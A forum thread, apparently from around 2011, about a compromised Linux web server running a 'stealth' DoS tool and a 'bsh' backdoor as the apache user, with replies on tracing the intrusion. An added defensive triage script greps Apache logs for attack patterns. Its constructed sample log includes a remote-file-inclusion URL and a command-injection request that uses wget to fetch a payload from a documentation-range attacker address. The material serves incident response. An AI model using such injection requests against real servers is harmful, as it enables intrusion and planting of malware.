Background: I run a Linux desktop, but it's also facing the net (port 8080) as a webserver. (For services, it's providing ssh, http, samba, amphetadesk, and webmin. I'm NAT'ed, though, so only port 8080 is actually facing the public.)
All of a sudden I couldn't get anywhere online, so I started investigating. While looking at network stats, I happened to notice one of my CPUs was spiked at full usage.
top revealed a process known as "stealth" -- owned by user apache -- at 100% CPU usage.
Anyone know what this is? Or where it came from? Unless they were really good (somehow breaching the router, getting into the LAN, and attacking me from there), the only port anyone could see was 8080, running Apache, so, assuming this was some exploit, that's how they got in.
I'm going to poke through the logs to see if I can find anything. But has anyone seen this before that can offer some help?
Okay, my apologies for the barrage of posts. I was sort of freaking out. As it's a desktop box, I have the luxury of just being able to pull it off the network and take my time. (I'm now on a laptop.)
What I'm really interested in now is how they got in. I'd have expected it to be over ssh or something, but they really shouldn't have been able to. (Unless first getting into something else on the LAN here.)
That "stealth" program is clearly no good:
# ./stealth -h
This tool is extremely dangerous. Use at your own risk!
Usage: st-kill <host> <port>
There's also a binary called sendmail, and the bin/bsh that they were running. "Reading" the binary of bin/bsh shows the string "You Have B4CKD0r3d this B0x....", along with references to things like memcpy, stdout, wapipid, strcopy, libc.so.6. (And tons of gibberish, since I'm looking at a binary file in vi.) Do you think (I can't find any information) that this is what was listening on port 80 / 8080 / 443? (I'd opened a telnet session to 80, but no matter what I typed, it didn't do anything.)
Can anyone offer me help in tracking exactly how they got in?
Kiddin, good work though. Next time you want to check out strings in a binary file there is the "strings" command (may or may not be installed) that can be easier than just looking through it with an editor.
Typically if you see a box with a lot of junk in /tmp and not-so-carefully hidden processes, you can be almost sure it's a vulnerability in a php or cgi script somewhere.
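The triage the reply describes (strings on the dropped binary, then hunting the Apache log for the PHP/CGI request that dropped it, which is what the original poster asked for), written out as an added example; this is not code from any post in the thread. The indicator lists, the fake "bsh" binary and the four access-log lines are constructed for illustration, 203.0.113.7 is a documentation address, and the tr(1) fallback and the /proc walk are assumptions about the box (Linux, GNU-ish userland).

```shell
#!/bin/sh
# Constructed triage helpers for a web-facing Linux box where an unknown
# binary runs as the apache user. Added example, not from the thread; the
# indicator lists, sample binary and sample log below are assumptions.

# Pull printable strings from a suspect binary, as the reply recommends.
# Falls back to tr(1) when binutils' strings(1) is not installed
# (assumption: a 6-byte minimum run, the same as strings -n 6).
extract_strings() {
    if command -v strings >/dev/null 2>&1; then
        strings -a -n 6 "$1"
    else
        tr -c '[:print:]' '\n' < "$1" | grep -E '^.{6,}$'
    fi
}

# Count strings that hint at a backdoor or DoS tool (constructed indicator
# list; extend it with whatever you actually find on the box).
score_binary() {
    extract_strings "$1" | grep -icE 'b4ckd0r|backdoor|listen|bind|/bin/sh|execve|stealth|kill'
}

# Print Apache combined-log lines that look like remote file inclusion or
# command injection through a PHP/CGI script: a URL inside the query
# string, download tools, temp directories, an encoded ';' (%3b) or a
# cmd= parameter. Deliberately loose; false positives are cheap here.
suspicious_requests() {
    grep -iE 'http(s)?(%3a|:)(%2f|/)(%2f|/)|wget|curl|/tmp|/dev/shm|%3b|cmd=|system\(|passthru' "$1"
}

suspicious_request_count() {
    suspicious_requests "$1" | grep -c ''
}

# List live processes whose executable was started from a temp directory
# or has since been deleted, a common trait of dropped tools (/proc only;
# as non-root you only see links for your own processes).
suspect_processes() {
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        case "$exe" in
            /tmp/*|/var/tmp/*|/dev/shm/*|*' (deleted)')
                echo "pid=${p#/proc/} exe=$exe" ;;
        esac
    done
}

# --- constructed sample input so the helpers run offline ---
SAMPLE_BIN=$(mktemp)
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_BIN" "$SAMPLE_LOG"' EXIT

# A fake "bsh": ELF magic, junk bytes, and the strings the thread reports.
printf '\177ELF\001\001\001\000\000\000You Have B4CKD0r3d this B0x....\000libc.so.6\000memcpy\000\001\002Usage: st-kill <host> <port>\000' > "$SAMPLE_BIN"

# Four constructed access-log lines: two normal, one RFI attempt against a
# hypothetical view.php, one command injection against a hypothetical CGI.
cat > "$SAMPLE_LOG" <<'EOF'
10.0.0.5 - - [03/May/2011:22:14:01 -0400] "GET /index.php HTTP/1.1" 200 5120
203.0.113.7 - - [03/May/2011:22:15:09 -0400] "GET /gallery/view.php?page=http://203.0.113.7/bsh.txt? HTTP/1.1" 200 214
203.0.113.7 - - [03/May/2011:22:15:11 -0400] "GET /cgi-bin/test.cgi?cmd=cd%20/tmp;wget%20http://203.0.113.7/stealth HTTP/1.1" 200 88
10.0.0.5 - - [03/May/2011:22:16:30 -0400] "GET /css/site.css HTTP/1.1" 200 1032
EOF

echo "indicator strings in sample binary: $(score_binary "$SAMPLE_BIN")"
echo "suspicious requests in sample log:"
suspicious_requests "$SAMPLE_LOG"
echo "processes running from temp dirs or deleted files:"
suspect_processes
```

On a real box, point score_binary at each file in /tmp and the log functions at the whole access_log (and the SSL log), then follow any hit by pulling every request from that client address and comparing the timestamps against the mtime of the dropped files; that pairing is usually what pins down the script that was exploited.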
This is May 4, 2011 and I have the same problem. I found your thread today with the same process running, owning nearly 100% CPU. The only difference is that the owner of that process is guest instead of apache. I have Fedora 14, and all packages are up-to-date.